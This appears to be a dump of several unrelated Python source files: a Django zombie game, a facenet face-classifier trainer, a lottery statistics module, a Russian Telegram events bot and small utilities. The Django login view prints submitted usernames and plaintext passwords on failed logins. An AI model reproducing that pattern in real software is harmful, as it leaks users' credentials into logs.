elif g.update_state.days > 0:
print "New Day: You survived another day!"
#Put these updates into a dictionary Q pickle ?
return render(request, 'zombieGame/game.html', context_dict)
def house(request):
g = Game()
g.start_new_day() #need to pickle so not resetting up again
context_dict = house_dict(g)
return render(request, 'zombieGame/house.html', context_dict)
def house_dict(g):
context_dict = {'current_house':g.street.get_current_house(),'current_room':g.street.get_current_house().get_current_room()}
return context_dict
#The main game view, requires user to be logged in
#@login_required
#def startGame(request):
# g = Game()
# g.start_new_day()
# #feel like the pickle stuff should be here but where does it go ?
# context_dict=fill_dict(g)
# return render(request, 'zombieGame/game.html', context_dict)
#need to add ammo, partysize, days
#In this view we create a context_dict variable, which we can alter what is outputted to the game.html
#this is only for street used a separate one for house
def fill_dict(g):
# game_state = g.game_state
#pps = pickle.dumps(g.player_state)
# g.player_state = pickle.loads(pps)
#ps = pickle.dumps(g.street)
#g.street = pickle.loads(ps)
context_dict = {'player_state':g.player_state, 'street': g.street, 'house_list': g.street.house_list, 'current_house':g.street.get_current_house(),
'turn': g.turn_options(), 'house_num': ['house_no']}
return context_dict
i=0
for i in g.street.house_list:
context_dict['house_no'].append(i)
i += 1
#Leaderboards view, requires user to be logged in
@login_required
def leaderboard(request):
num = [1,2,3,4,5,6,7,8,9,10]
kills = UserProfile.objects.order_by('-kills')[:10]
days = UserProfile.objects.order_by('-days')[:10]
people = UserProfile.objects.order_by('-people')[:10]
context_dict = {'index':num, 'kills':kills, 'days':days, 'people':people,}
return render(request, 'zombieGame/leaderboard.html', context_dict)
#Register view
def register(request):
registered = False
if request.method == 'POST':
user_form = UserForm(data=request.POST)
profile_form = UserProfileForm(data=request.POST)
if user_form.is_valid() and profile_form.is_valid():
user = user_form.save()
user.set_password(user.password)
user.save()
profile = profile_form.save(commit=False)
profile.user = user
if 'picture' in request.FILES:
profile.picture = request.FILES['picture']
# profile.user.kills = 0
# profile.user.survival = 0
profile.save()
registered = True
else:
print user_form.errors, profile_form.errors
else:
user_form = UserForm()
profile_form = UserProfileForm()
return render(request,
'zombieGame/register.html',
{'user_form': user_form, 'profile_form': profile_form, 'registered': registered} )
#Login view
def user_login(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user:
if user.is_active:
auth_login(request, user)
return HttpResponseRedirect('/zombieGame/profile/')
else:
return HttpResponse("Your account is disabled.")
else:
print "Invalid login details: {0}, {1}".format(username, password)
return HttpResponse("Invalid login details supplied.")
else:
return render(request, 'zombieGame/login.html', {})
#Logout view
@login_required
def user_logout(request):
logout(request)
return HttpResponseRedirect('/zombieGame/') |
984,659 | af28eb8a2fcd2774fd9070e086aef35bf81093ad | """An example of how to use your own dataset to train a classifier that recognizes people.
"""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import math
import os
from os import path
import pickle
import sys
import shutil
import numpy as np
from sklearn import svm
import facenet
from ml_serving.drivers import driver
try:
from mlboardclient.api import client
except ImportError:
client = None
def update_data(data, use_mlboard, mlboard):
if use_mlboard and mlboard:
mlboard.update_task_info(data)
def upload_model(use_mlboard, mlboard, classifier_path, model, version):
if not use_mlboard or not mlboard:
return
print('Uploading model...')
dirname = '/tmp/classifier'
os.makedirs(dirname)
shutil.copy(classifier_path, path.join(dirname, path.basename(classifier_path)))
mlboard.model_upload(model, version, dirname)
shutil.rmtree(dirname)
update_data({'model_uploaded': True}, use_mlboard, mlboard)
print("New model uploaded as '%s', version '%s'." % (model, version))
def main(args):
use_mlboard = False
mlboard = None
if client:
mlboard = client.Client()
try:
mlboard.apps.get()
except Exception:
mlboard = None
print('Do not use mlboard.')
else:
print('Use mlboard parameters logging.')
use_mlboard = True
if args.use_split_dataset:
dataset_tmp = facenet.get_dataset(args.data_dir)
train_set, test_set = split_dataset(dataset_tmp, args.min_nrof_images_per_class,
args.nrof_train_images_per_class)
if args.mode == 'TRAIN':
dataset = train_set
elif args.mode == 'CLASSIFY':
dataset = test_set
else:
dataset = facenet.get_dataset(args.data_dir)
update_data({'mode': args.mode}, use_mlboard, mlboard)
# Check that there are at least one training image per class
for cls in dataset:
assert len(cls.image_paths) > 0, 'There must be at least one image for each class in the dataset'
paths, labels = facenet.get_image_paths_and_labels(dataset)
print('Number of classes: %d' % len(dataset))
print('Number of images: %d' % len(paths))
data = {
'num_classes': len(dataset),
'num_images': len(paths),
'model_path': args.model,
'image_size': args.image_size,
'data_dir': args.data_dir,
'batch_size': args.batch_size,
}
update_data(data, use_mlboard, mlboard)
# Load the model
print('Loading feature extraction model')
# Load driver
drv = driver.load_driver(args.driver)
# Instantinate driver
serving = drv()
serving.load_model(
args.model,
inputs='input:0,phase_train:0',
outputs='embeddings:0',
device=args.device,
)
# Run forward pass to calculate embeddings
print('Calculating features for images')
nrof_images = len(paths)
nrof_batches_per_epoch = int(math.ceil(1.0 * nrof_images / args.batch_size))
emb_array = np.zeros((nrof_images, 512))
for i in range(nrof_batches_per_epoch):
start_index = i * args.batch_size
end_index = min((i + 1) * args.batch_size, nrof_images)
paths_batch = paths[start_index:end_index]
for j in range(end_index - start_index):
print('Batch {} <-> {}'.format(paths_batch[j], labels[start_index + j]))
images = facenet.load_data(paths_batch, False, False, args.image_size)
if serving.driver_name == 'tensorflow':
feed_dict = {'input:0': images, 'phase_train:0': False}
elif serving.driver_name == 'openvino':
input_name = list(serving.inputs.keys())[0]
# Transpose image for channel first format
images = images.transpose([0, 3, 1, 2])
feed_dict = {input_name: images}
else:
raise RuntimeError('Driver %s currently not supported' % serving.driver_name)
outputs = serving.predict(feed_dict)
emb_array[start_index:end_index, :] = list(outputs.values())[0]
classifier_filename_exp = os.path.expanduser(args.classifier_filename)
if args.mode == 'TRAIN':
# Train classifier
print('Training classifier')
model = svm.SVC(kernel='linear', probability=True)
model.fit(emb_array, labels)
# Create a list of class names
class_names = [cls.name.replace('_', ' ') for cls in dataset]
print('Classes:')
print(class_names)
# Saving classifier model
with open(classifier_filename_exp, 'wb') as outfile:
pickle.dump((model, class_names), outfile, protocol=2)
print('Saved classifier model to file "%s"' % classifier_filename_exp)
elif args.mode == 'CLASSIFY':
# Classify images
print('Testing classifier')
with open(classifier_filename_exp, 'rb') as infile:
(model, class_names) = pickle.load(infile)
print('Loaded classifier model from file "%s"' % classifier_filename_exp)
predictions = model.predict_proba(emb_array)
best_class_indices = np.argmax(predictions, axis=1)
best_class_probabilities = predictions[np.arange(len(best_class_indices)), best_class_indices]
for i in range(len(best_class_indices)):
print('%4d %s: %.3f' % (i, class_names[best_class_indices[i]], best_class_probabilities[i]))
accuracy = np.mean(np.equal(best_class_indices, labels))
update_data({'accuracy': accuracy}, use_mlboard, mlboard)
print('Accuracy: %.3f' % accuracy)
if args.upload_model and accuracy >= args.upload_threshold:
timestamp = datetime.datetime.now().strftime('%s')
model_name = 'facenet-classifier'
version = '1.0.0-%s-%s' % (args.driver, timestamp)
print('Uploading model as %s:%s' % (model_name, version))
upload_model(
use_mlboard,
mlboard,
classifier_filename_exp,
model_name,
version
)
def split_dataset(dataset, min_nrof_images_per_class, nrof_train_images_per_class):
train_set = []
test_set = []
for cls in dataset:
paths = cls.image_paths
# Remove classes with less than min_nrof_images_per_class
if len(paths) >= min_nrof_images_per_class:
np.random.shuffle(paths)
train_set.append(facenet.ImageClass(cls.name, paths[:nrof_train_images_per_class]))
test_set.append(facenet.ImageClass(cls.name, paths[nrof_train_images_per_class:]))
return train_set, test_set
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument(
'mode',
type=str,
choices=['TRAIN', 'CLASSIFY'],
help='Indicates if a new classifier should be trained or a classification ' +
'model should be used for classification',
default='CLASSIFY'
)
parser.add_argument(
'data_dir',
type=str,
help='Path to the data directory containing aligned LFW face patches.'
)
parser.add_argument(
'model',
type=str,
help='Path to .xml openVINO IR file'
)
parser.add_argument(
'classifier_filename',
help='Classifier model file name as a pickle (.pkl) file. ' +
'For training this is the output and for classification this is an input.'
)
parser.add_argument(
'--use_split_dataset',
help='Indicates that the dataset specified by data_dir should be split into a training and test set. ' +
'Otherwise a separate test set can be specified using the test_data_dir option.',
action='store_true'
)
parser.add_argument(
'--device',
help='Device for openVINO.',
default="MYRIAD",
choices=["CPU", "MYRIAD"]
)
parser.add_argument(
'--driver',
help='Driver for inference.',
default="tensorflow",
)
parser.add_argument(
'--batch_size',
type=int,
help='Number of images to process in a batch.',
default=1
)
parser.add_argument(
'--image_size',
type=int,
help='Image size (height, width) in pixels.',
default=160
)
parser.add_argument(
'--min_nrof_images_per_class',
type=int,
help='Only include classes with at least this number of images in the dataset',
default=20
)
parser.add_argument(
'--nrof_train_images_per_class',
type=int,
help='Use this number of images from each class for training and the rest for testing',
default=10
)
parser.add_argument(
'--upload-threshold',
type=float,
default=0.9,
help='Threshold for uploading model',
)
parser.add_argument(
'--upload-model',
action='store_true',
default=False,
)
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
|
984,660 | 0e0acdfa9ae36d4cd96cc142acd6ac785870a59d | import sys
tempdict={}
filename=open(sys.argv[1],"r")
lines=filename.readlines()
filename.close()
counter=0
for i in lines:
i=i[:-1]
words=i.split(" ")
numberofwords=len(words)
for a in words:
for b in words:
for c in words:
if (a!=b and a!=c and b!=c):
try:
strname=a+" "+b+" "+c
tempdict[strname]+=1
except KeyError:
tempdict[strname]=1
counter+=1
fileoutput=open(sys.argv[2],"w")
fileoutput.write("Trigram\t\tP(N)\n\n")
for i in tempdict.keys():
fileoutput.write(str(i))
fileoutput.write("\t\t")
value=float(tempdict[i])/counter
fileoutput.write(str(value))
fileoutput.write("\n")
fileoutput.close()
|
984,661 | 94b7f06265514622c10aef167084953302a67b28 | from aocd.models import Puzzle
puzzle = Puzzle(year=2022, day=2)
abc_map = {"A": "R", "B": "P", "C": "S"}
score_map = {"R": 1, "P": 2, "S": 3}
how_to_win_map = {"R": "P", "P": "S", "S": "R"}
how_to_lose_map = {"R": "S", "P": "R", "S": "P"}
def get_total_score(inp):
total_score = 0
for line in inp.split("\n"):
they_play_coded, desired_outcome = line.split(" ")
they_play = abc_map[they_play_coded]
match desired_outcome:
case "X":
# lose
i_play = how_to_lose_map[they_play]
case "Y":
# draw
i_play = they_play
total_score += 3
case "Z":
# win
i_play = how_to_win_map[they_play]
total_score += 6
case _:
raise Exception(f"Invalid desired outcome {desired_outcome}")
total_score += score_map[i_play]
return total_score
print(get_total_score(puzzle.input_data))
|
984,662 | 50e1e34495204121c8796fb9288e2f3519274b8a | def leiaint(mensagem):
ok =False
valor = 0
while True:
numero = str(input(mensagem))
if numero.isnumeric():
valor = int(numero)
ok = True
else:
print("\033[0:31mErro! Informe um numero inteiro valido.\033[m")
if ok:
break
return valor
def linha(tam = 45):
return '-' * tam
def cabeçalho( txt ):
print(linha())
print(txt.center(42))
print(linha())
def menu(Lista):
cabeçalho("MENU PRINCIPAL")
contador = 1
for item in Lista:
print(f'\033[33m{contador}\033[m - \033[32m{item}\033[m')
contador += 1
print(linha())
opção = leiaint("\033[36mSua Opção:\033[m")
return opção
|
984,663 | 0d9584c8ea15ccdb12462f4d917f01445b7758db | from django.db import models
from django_extensions.db.models import TimeStampedModel
# Create your models here.
class Position(TimeStampedModel):
id = models.AutoField(primary_key = True)
lng = models.FloatField(null=False,blank=False,max_length=50)
lat = models.FloatField(null=False,blank=False,max_length=50)
def __str__(self):
return str(self.id)
class City(TimeStampedModel):
id = models.AutoField(primary_key = True)
city_name = models.CharField(null=False,blank=False,max_length=25)
pos = models.ForeignKey(Position)
def __str__(self):
return str(self.city_name) |
984,664 | 659e4aaf0ef2cdc4f04a3b5fcf238ad76f5a0d76 | #!usr/bin/python
# encoding: utf-8
__all__ = ['Record','RecordCollection','FileReader','Stats']
from constants import *
# 03001 10 11 12 13 26 28 11 10307806 0 0 898744 1 2003-2-20 2003-2-23
class Record:
def __init__(self,parts):
self.__init(parts)
self.__stats()
#print self.str()
#print self.stats_str()
def __init(self,parts):
self.id = parts[0]
self.n1 = int(parts[1])
self.n2 = int(parts[2])
self.n3 = int(parts[3])
self.n4 = int(parts[4])
self.n5 = int(parts[5])
self.n6 = int(parts[6])
self.n7 = int(parts[7])
self.total_money = int(parts[8])
self.one_money = int(parts[9])
self.one_count = int(parts[10])
self.two_money = int(parts[11])
self.two_count = int(parts[12])
self.start_date = parts[13]
self.end_date = parts[14]
def __stats(self):
self.__stats_red_blue()
self.__stats_red()
def __stats_red_blue(self):
self.red_sum = 0
self.blue_sum = 0
self.red_01_str = ""
self.blue_01_str = ""
self.red_01_count = (0,0)
self.blue_01_count = (0,0)
self.red_prim_count = 0
self.blue_prim_count = 0
# 1-11, 12-22,23-33
self.red_3zone_count = (0,0,0)
# 1-8, 9-16
self.blue_2zone_count = (0,0)
# get stats
# red
red_list = [self.n1,self.n2,self.n3,self.n4,self.n5,self.n6]
c0 = 0
c1 = 0
prim = 0
for n in red_list:
self.red_sum += n
if n%2==0:
self.red_01_str += '0'
c0 += 1
else:
self.red_01_str += '1'
c1 += 1
# red prim
if n in RED_PRIM_LIST:
prim += 1
self.red_01_count = (c0,c1)
self.red_prim_count = prim
# blue
blue_list = [self.n7]
c0 = 0
c1 = 0
prim = 0
for n in blue_list:
self.blue_sum += n
if n%2==0:
self.blue_01_str += '0'
c0 += 1
else:
self.blue_01_str += '1'
c1 += 1
# blue prim
if n in BLUE_PRIM_LIST:
prim += 1
self.blue_01_count = (c0,c1)
self.blue_prim_count = prim
# zone stats
# red
zone1 = 0
zone2 = 0
zone3 = 0
for n in red_list:
if n>=RED_ZONE1[0] and n<=RED_ZONE1[1]:
zone1 +=1
elif n>=RED_ZONE2[0] and n<=RED_ZONE2[1]:
zone2 +=1
elif n>=RED_ZONE3[0] and n<=RED_ZONE3[1]:
zone3 +=1
self.red_3zone_count = (zone1,zone2,zone3)
# blue
zone1 = 0
zone2 = 0
for n in blue_list:
if n>=BLUE_ZONE1[0] and n<=BLUE_ZONE1[1]:
zone1 +=1
elif n>=BLUE_ZONE2[0] and n<=BLUE_ZONE2[1]:
zone2 +=1
self.blue_2zone_count = (zone1,zone2)
def __stats_red(self):
red_list = [self.n1,self.n2,self.n3,self.n4,self.n5,self.n6]
# (1) red shift to base
# 2,13,17,20,25,33===>11,15,18,23,31
self.red_shift_to_base = []
for n in red_list[1:]:
self.red_shift_to_base.append(n-red_list[0])
# (2) red head-tail width
self.red_width = self.n6-self.n1
# (3) red delta
# 2,13,17,20,25,33===> 11,4,3,5,8
def stats_str(self):
return "<stats>\n [red] sum={0} 01_str={1} 01_count={2} prim={3}\n [blue] sum={4} 01_str={5} 01_count={6} prim={7}\n 3zone = {8}".format(self.red_sum,self.red_01_str,self.red_01_count,self.red_prim_count,
self.blue_sum,self.blue_01_str,self.blue_01_count,self.blue_prim_count,
self.red_3zone_count)
def long_str(self):
return "{0} [{1} {2} {3} {4} {5} {6} {7}] {8} {9} {10} {11} {12} {13} {14}".format(self.id,self.n1,self.n2,self.n3,self.n4,self.n5,self.n6,self.n7,self.total_money,self.one_money,self.one_count,self.two_money,self.two_count,self.start_date,self.end_date)
def short_str(self):
return "{0} [{1} {2} {3} {4} {5} {6} {7}] {8}/{9}".format(self.id,self.n1,self.n2,self.n3,self.n4,self.n5,self.n6,self.n7,self.start_date,self.end_date)
def str(self):
return "%s [%02d %02d %02d %02d %02d %02d %02d] %s/%s" % (self.id,self.n1,self.n2,self.n3,self.n4,self.n5,self.n6,self.n7,self.start_date,self.end_date)
def __str__(self):
return self.long_str()
class RecordCollection:
def __init__(self):
self.records = []
def get_records(self):
return self.records
def get_record_count(self):
return len(self.records)
def add_record(self,record):
self.records.append(record)
def get_record_by_id(self,id):
# 03088
if(len(id)!=5):
print "Error. invalid id %s".format(id)
return None
for record in self.records:
if id == record.id:
return record
print "Warning. can not find record id =%s".format(id)
return None
"""
querying methods:
return a list of record
"""
def query_by_year(self,year):
# 2003,2009--->03,09
# 2010,2011--->10,11
if(year<START_YEAR or len(str(year))!=4):
print "Error. invalid year {0}".format(year)
return None
str_year = str(year)
year = str_year[-2:]
result = []
for record in self.records:
if (year == record.id[:2]):
result.append(record)
return result
def query_by_year_month(self,year,month):
# 2003,2
# '2003-2-23' '2003-2-27'
if(year<START_YEAR or len(str(year))!=4):
print "Error. invalid year {0}".format(year)
return None
if(month<1 or month>MONTH):
print "Error. invalid month {0}".format(month)
return None
result = []
for record in self.records:
parts = record.end_date.split("-")
if year==int(parts[0]) and month == int(parts[1]) :
result.append(record)
return result
def __x_query_by_date(self,date):
# '2003-9-4'
for record in self.records:
if (date == record.end_date):
return [record]
print "Warning. can not find record id =%s".format(id)
return None
def query_by_year_month_day(self,year,month,day):
# 2003,2,23
# '2003-2-23'
if(year<START_YEAR or len(str(year))!=4):
print "Error. invalid year {0}".format(year)
return None
if(month<1 or month>MONTH):
print "Error. invalid month {0}".format(month)
return None
if(day<1 or day>31):
print "Error. invalid day {0}".format(day)
return None
date = '{0}-{1}-{2}'.format(year,month,day)
return self.__x_query_by_date(date)
def __x_query_by_number_pos_1(self,n):
result = []
for record in self.records:
if n == record.n1 :
result.append(record)
return result
def __x_query_by_number_pos_2(self,n):
result = []
for record in self.records:
if n == record.n2 :
result.append(record)
return result
def __x_query_by_number_pos_3(self,n):
result = []
for record in self.records:
if n == record.n3 :
result.append(record)
return result
def __x_query_by_number_pos_4(self,n):
result = []
for record in self.records:
if n == record.n4 :
result.append(record)
return result
def __x_query_by_number_pos_5(self,n):
result = []
for record in self.records:
if n == record.n5 :
result.append(record)
return result
def __x_query_by_number_pos_6(self,n):
result = []
for record in self.records:
if n == record.n6 :
result.append(record)
return result
def __x_query_by_number_pos_7(self,n):
result = []
for record in self.records:
if n == record.n7 :
result.append(record)
return result
def query_by_number_pos(self,n,pos):
# pos = 1,2,3,4,5,6,7
if(pos<1 or pos>7):
print 'Error. valid pos is 1-7.'
return None
if(pos==7):
if (n>BLUE_MAX_NUMBER):
print "Error. blue number >=%s" % BLUE_MAX_NUMBER
return None
else:
if (n>RED_MAX_NUMBER):
print "Error. red number >=%s" % RED_MAX_NUMBER
return None
methods = {
1:self.__x_query_by_number_pos_1,
2:self.__x_query_by_number_pos_2,
3:self.__x_query_by_number_pos_3,
4:self.__x_query_by_number_pos_4,
5:self.__x_query_by_number_pos_5,
6:self.__x_query_by_number_pos_6,
7:self.__x_query_by_number_pos_7
}
return methods[pos](n)
def save(self,filepath):
with open(filepath,'w') as f:
for record in self.records:
line = "%02d %02d %02d %02d %02d %02d %02d\n" % (record.n1,record.n2,record.n3,record.n4,record.n5,record.n6,record.n7)
f.write(line)
print "generated {0}.".format(filepath)
def query_by_number_list(self,number_list):
if(len(number_list)>7):
print "Error. number list count>7"
return None
result = []
for record in self.records:
list7 = [record.n1,record.n2,record.n3,record.n4,record.n5,record.n6,record.n7]
base_set = set(list7)
query_set = set(number_list)
if query_set.issubset(base_set):
result.append(record)
return result
def test_number(self,n1,n2,n3,n4,n5,n6,n7):
#03056 08 17 21 26 28 29 07 32664536 5000000 1 557563 3 2003-8-31 2003-9-4
#result = query_by_number_list([n1,n2,n3,n4,n5,n6,n7])
for record in self.records:
if (n1==record.n1 and n2==record.n2 and n3==record.n3 and n4==record.n4
and n5==record.n5 and n6==record.n6 and n7==record.n7):
print 'Hit. [{0} {1} {2} {3} {4} {5} {6}] at {7} on {8}'.format(n1,n2,n3,n4,n5,n6,n7,record.id,record.end_date)
return True
print 'NO Hit. [{0} {1} {2} {3} {4} {5} {6}]'.format(n1,n2,n3,n4,n5,n6,n7)
return False
class FileReader:
def __init__(self):
self.sep = ' '
def process(self,filepath):
rc = RecordCollection()
for line in open(filepath,'r'):
parts = line.strip('\n').split(self.sep)
if(len(parts)!=RECORD_FIELD):
print "ERROR. record field %d!" % len(parts)
return None
record = Record(parts)
rc.add_record(record)
return rc
class Stats:
def __init__(self,rc):
self.__init(rc)
def __init(self,rc):
self.rc = rc
# red stats
self.red_sum_list = []
self.red_01_str_list = []
self.red_01_count_list = []
self.red_prim_count_list = []
self.red_3zone_count_list = []
self.__get_red_xxx_list()
# blue stats
self.blue_sum_list = []
self.blue_01_str_list = []
self.blue_01_count_list = []
self.blue_prim_count_list = []
self.blue_2zone_count_list = []
self.__get_blue_xxx_list()
# avg avg_e
self.red_sum_avg = self.__avg_list(self.red_sum_list)
self.blue_sum_avg = self.__avg_list(self.blue_sum_list)
self.red_sum_avg_e = (RED_MIN_NUMBER + RED_MAX_NUMBER)*RED_COUNT/2.0
self.blue_sum_avg_e = (BLUE_MIN_NUMBER + BLUE_MAX_NUMBER)*BLUE_COUNT/2.0
# red only
# red shift base
self.red_shift_to_base_list = self.__get_red_shift_to_base_list()
# red width
self.red_width_list = self.__get_red_width_list()
# red/blue prim pair
self.prim_count_list = zip(self.red_prim_count_list,self.blue_prim_count_list)
def __avg_list(self,list):
count = len(list)
if(count==0):
return 0.0
total_sum = 0
for n in list:
total_sum += n
return total_sum*1.0/count
def __inf(self,filename):
return "{0}{1}".format(INPUT_FOLDER,filename)
def __outf(self,filename):
return "{0}{1}".format(OUTPUT_FOLDER,filename)
def __save_list(self,filename,list):
filepath = self.__outf(filename)
with open(filepath,'w') as f:
for item in list:
line = str(item)+"\n"
f.write(line)
print "saved {0}.".format(filepath)
def save(self):
self.__save_list('red_sum_list',self.red_sum_list)
self.__save_list('blue_sum_list',self.blue_sum_list)
self.__save_list('red_01_str_list',self.red_01_str_list)
self.__save_list('blue_01_str_list',self.blue_01_str_list)
self.__save_list('red_01_count_list',self.red_01_count_list)
self.__save_list('blue_01_count_list',self.blue_01_count_list)
self.__save_list('red_prim_count_list',self.red_prim_count_list)
self.__save_list('blue_prim_count_list',self.blue_prim_count_list)
self.__save_list('prim_count_list',self.prim_count_list)
self.__save_list('red_3zone_count_list',self.red_3zone_count_list)
self.__save_list('blue_2zone_count_list',self.blue_2zone_count_list)
# red only
self.__save_list('red_shift_to_base_list',self.red_shift_to_base_list)
self.__save_list('red_width_list',self.red_width_list)
"""
get red xxx list
"""
def __get_red_xxx_list(self):
for record in self.rc.get_records():
self.red_sum_list.append(record.red_sum)
self.red_01_str_list.append(record.red_01_str)
self.red_01_count_list.append(record.red_01_count)
self.red_prim_count_list.append(record.red_prim_count)
self.red_3zone_count_list.append(record.red_3zone_count)
"""
get blue xxx list
"""
def __get_blue_xxx_list(self):
for record in self.rc.get_records():
self.blue_sum_list.append(record.blue_sum)
self.blue_01_str_list.append(record.blue_01_str)
self.blue_01_count_list.append(record.blue_01_count)
self.blue_prim_count_list.append(record.blue_prim_count)
self.blue_2zone_count_list.append(record.blue_2zone_count)
def get_red_sum_avg_e(self):
return self.red_sum_avg_e
def get_red_sum_avg(self):
return self.red_sum_avg
def get_blue_sum_avg_e(self):
return self.blue_sum_avg_e
def get_blue_sum_avg(self):
return self.blue_sum_avg
"""
red related methods
"""
# red shift to base
def __get_red_shift_to_base_list(self):
self.red_shift_to_base_list = []
for record in self.rc.get_records():
self.red_shift_to_base_list.append(record.red_shift_to_base)
return self.red_shift_to_base_list
# red width
def __get_red_width_list(self):
self.red_width_list = []
for record in self.rc.get_records():
self.red_width_list.append(record.red_width)
return self.red_width_list
|
984,665 | c9600fbea1ebd68a2e6337d00133aa78b90c5fb5 | import ast
from cgi import log
import requests
import telebot
import constants1 as constants
from telebot import types
from choice import choice_main, location_search, users_count
sm = u'\U0001F603'
sm1 = u'\U0001F601'
bot = telebot.TeleBot(constants.token)
@bot.message_handler(commands=['help'])
def handle_text(message):
bot.send_message(message.chat.id, constants.helpAnswer)
log(message, constants.helpAnswer)
@bot.message_handler(commands=['start', 'Начать'])
def handle_start(message):
markup = types.ReplyKeyboardMarkup()
markup.row('/События рядом')
markup.row('/Все события')
bot.send_message(message.chat.id, "Выберите категорию", reply_markup=markup)
@bot.message_handler(commands=["События"])
def request_location(message):
# Эти параметры для клавиатуры необязательны, просто для удобства
keyboard = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)
button_geo = types.KeyboardButton(text="Отправить местоположение", request_location=True)
keyboard.add(button_geo)
bot.send_message(message.chat.id, "Нам нужно ваше местоположение", reply_markup=keyboard)
@bot.message_handler(content_types=['location'])
def location(message):
bot.send_message(message.chat.id, 'Подождите...Ищем события... ')
lat = (ast.literal_eval(str(message.location))["latitude"])
lon = (ast.literal_eval(str(message.location))["longitude"])
big_dick=""
answer = location_search(lat, lon)
for d in range(len(answer)):
if type(answer) == str:
big_dick = answer
else:
try:
message1 = "\n" + answer[d]["title"] + "\n" + answer[d][
"content"] + "\n" + "Начало события: " + \
answer[d][
"start"] + "\n" + "Конец события: " + answer[d]["end"] + "\n" + answer[d][
"url"]
except KeyError:
message1 = "\n" + answer[d]["title"] + "\n" + answer[d][
"content"] + "\n" + answer[d]["end"] + "\n" + answer[d][
"url"]
big_dick += message1
bot.send_message(message.chat.id, big_dick)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=1)
keyboard.add(types.KeyboardButton('/Начать сначала'))
bot.send_message(message.chat.id, sm + 'Мы всегда рады помочь Вам!', reply_markup=keyboard)
@bot.message_handler(commands=['Все'])
def handle_start(message):
markup = types.ReplyKeyboardMarkup()
markup.row('/Квесты', '/Концерты')
markup.row('/Стендап', '/Фестивали')
markup.row('/Знания', '/Выставки')
markup.row('/Ярмарки', '/Дети')
markup.row('/Постоянные выставки')
bot.send_message(message.chat.id, constants.startAnswer, reply_markup=markup)
log(message, constants.startAnswer)
@bot.message_handler(commands=['Квесты'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Концерты'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Стендап'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Показать события')
markup1.add(m1)
bot.send_message(message.chat.id, 'Данное событие является платным', reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Фестивали'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Ярмарки'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Постоянные'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Выставки'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Знания'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
@bot.message_handler(commands=['Дети'])
def handle_start(message):
markup1 = types.ReplyKeyboardMarkup(row_width=2)
m1 = types.KeyboardButton('/Платное')
m2 = types.KeyboardButton('/Бесплатное')
m3 = types.KeyboardButton('/Не имеет значения')
markup1.add(m1, m2, m3)
bot.send_message(message.chat.id, "Выберите тип события", reply_markup=markup1)
global text
text = message.text
